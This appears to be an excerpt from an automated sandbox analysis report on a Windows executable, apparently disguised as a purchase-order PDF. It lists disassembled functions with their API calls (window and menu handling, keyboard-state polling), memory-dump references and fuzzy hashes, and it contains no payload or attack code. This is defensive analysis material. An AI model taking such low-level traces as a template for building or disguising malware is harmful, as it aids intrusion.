                                                                                                                                                                                                                                                                                                            • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                                                                                                                                                                                                                            Function 0046EA7F Relevance: 16.7, APIs: 11, Instructions: 167windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00630053), ref: 0046EB4F
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00690072), ref: 0046EB67
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000001), ref: 0046EB7F
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(004C0049), ref: 0046EB97
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 802431696-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                                                                                                                                                                                            • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                                                                                                                                                                                                                                            Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                                                                                                                                                                                                            • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                                                                                                                                                                                                                                                            Function 00474335 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 0-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: adf9b533baf9c6d895fed7716c62bbc7555b06f3d13ea9c408be328cba3f13f9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adf9b533baf9c6d895fed7716c62bbc7555b06f3d13ea9c408be328cba3f13f9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                                                                                                                                                                                                                                                            Function 004507E7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00450944
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00450955
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: -----$SysListView32
                                                                                                                                                                                                                                                                                                            • API String ID: 4008455318-3975388722
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                                                                                                                                                                                                            • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                                                                                                                                                                                                                                            Function 00448602 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00448625
                                                                                                                                                                                                                                                                                                            • CreateMenu.USER32 ref: 0044863C
                                                                                                                                                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 004486EB
                                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004486F5
                                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00448742
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 176399719-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                                                                                                                                                                                            • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                                                                                                                                                                                                                                            Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 004692A4
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 004692C7
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                            • API String ID: 2040099840-1403004172
                                                                                                                                                                                                                                                                                                            • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                                                                                                                                                                                            • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                                                                                                                                                                                                                            Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 0046949E
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 004694C1
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                            • API String ID: 2040099840-1403004172
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                                                                                                                                                                                                            • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                                                                                                                                                                                                                                            Function 00448DAF Relevance: 15.2, APIs: 10, Instructions: 173windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3771399671-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                                                                                                                                                                                                            • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                                                                                                                                                                                                                                            Function 0046ECBF Relevance: 15.1, APIs: 10, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3413494760-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                                                                                                                                                                                                                                            • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
